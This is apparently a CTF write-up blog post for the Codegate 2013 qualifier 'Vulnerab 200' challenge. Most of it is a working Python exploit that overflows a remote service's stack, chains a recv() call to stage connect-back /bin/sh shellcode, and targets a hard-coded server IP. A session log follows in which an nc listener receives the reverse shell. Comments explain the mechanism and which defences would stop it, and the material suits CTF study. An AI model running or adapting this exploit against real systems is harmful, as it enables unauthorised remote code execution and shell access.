
Codegate 2013 Qual - Vulnerab 200 (Exploit only)

pwn3r_45 2013. 4. 17. 01:46

Category : Pwnables


level2


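Summary : a simple stack-based buffer overflow in a network service, reachable remotely over TCP. The exploit below depends on hard-coded addresses in the binary and on executing data it has written into memory, so a stack canary, non-executable data pages, or a position-independent build with ASLR would each stop it as written.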


Exploit

#!/usr/bin/python


from socket import *

from struct import pack


# NOTE: Python 2 script. The payload is built by concatenating str objects with
# the output of struct.pack, which only works where pack() returns str.

# Pack an integer as a 4-byte little-endian unsigned value ("<L"). Every
# address and argument word in the payload below goes through this helper.
p = lambda x : pack("<L", x)


# HOST is assigned twice and the second assignment wins, so the script talks
# to the contest server. "localhost" is presumably left over from local testing.
HOST = "localhost"

HOST = "58.229.122.19"

PORT = 7777


# Hard-coded 32-bit addresses and a descriptor number. The target binary is not
# shown on this page, so the meanings below are read from the names and from
# how the values are used in the payload -- TODO confirm against the binary.
#   recv_plt  : presumably the PLT entry for recv() in the service binary
#   freespace : presumably a writable address inside the binary's image
#   pr        : presumably a "pop <reg>; ret" gadget (see the payload notes)
#   fd        : presumably the descriptor of the client socket inside the service
# Fixed addresses like these are only stable when the binary loads at the same
# base every run; a position-independent build with ASLR would invalidate them.
recv_plt = 0x08048780

freespace = 0x0804B0f0

pr = 0x08048983

fd = 4


# Second-stage machine code, sent only after the overflow has been triggered.
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x00\x00\x00\x00\x66\x68\x7a\x69\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# Per the author, this is connect-back shellcode that runs /bin/sh. The session
# shown after the script has a listener on port 31337 accepting a connection
# from the target host. For a defender this stage is visible as an unexpected
# outbound TCP connection from the service host, and default-deny egress
# filtering would block it.


# Overflow payload: 0xef filler bytes followed by six 32-bit words. The words
# read as a 32-bit cdecl call frame for recv(sockfd, buf, len, flags):
#   recv_plt        -> lands where the saved return address is expected to be
#   pr              -> return address that recv() will use when it finishes
#   fd              -> sockfd
#   freespace       -> buf
#   len(shellcode)  -> len
#   0               -> flags
# If pr is a pop/ret gadget as assumed above, it discards the fd word and
# returns into the next one, freespace, where the received bytes now sit.
# NOTE(review): nothing here leaks or bypasses a stack canary, and the staged
# bytes are executed from a data address, so the technique presumably relies on
# the binary having no canary and an executable data region -- confirm.
payload = ""

payload += "a"*0xef

payload += p(recv_plt)

payload += p(pr)

payload += p(fd)

payload += p(freespace)

payload += p(len(shellcode))

payload += p(0)


# Network exchange. socket() with no arguments creates an IPv4 TCP socket.
# No timeout is set and no reply is inspected, so the script gives no
# indication of whether either stage was accepted.
s = socket()

s.connect((HOST, PORT))

# Read and discard up to 1024 bytes (presumably the service banner or prompt).
s.recv(1024)

# The overflow is delivered as the argument of the service's "write" command.
s.send("write "+payload)

# Read and discard the service's reply to the command.
s.recv(1024)

# Second stage: these bytes are expected to be consumed by the recv() call
# set up in the payload and stored at freespace.
s.send(shellcode)

s.close()



root@ubuntu:~/vuln/200# ./exploit.py 


----------------------------------------------------------------


root@ubuntu:~/vuln/200# nc -lv 31337

Connection from 58.229.122.19 port 31337 [tcp/*] accepted

id

uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)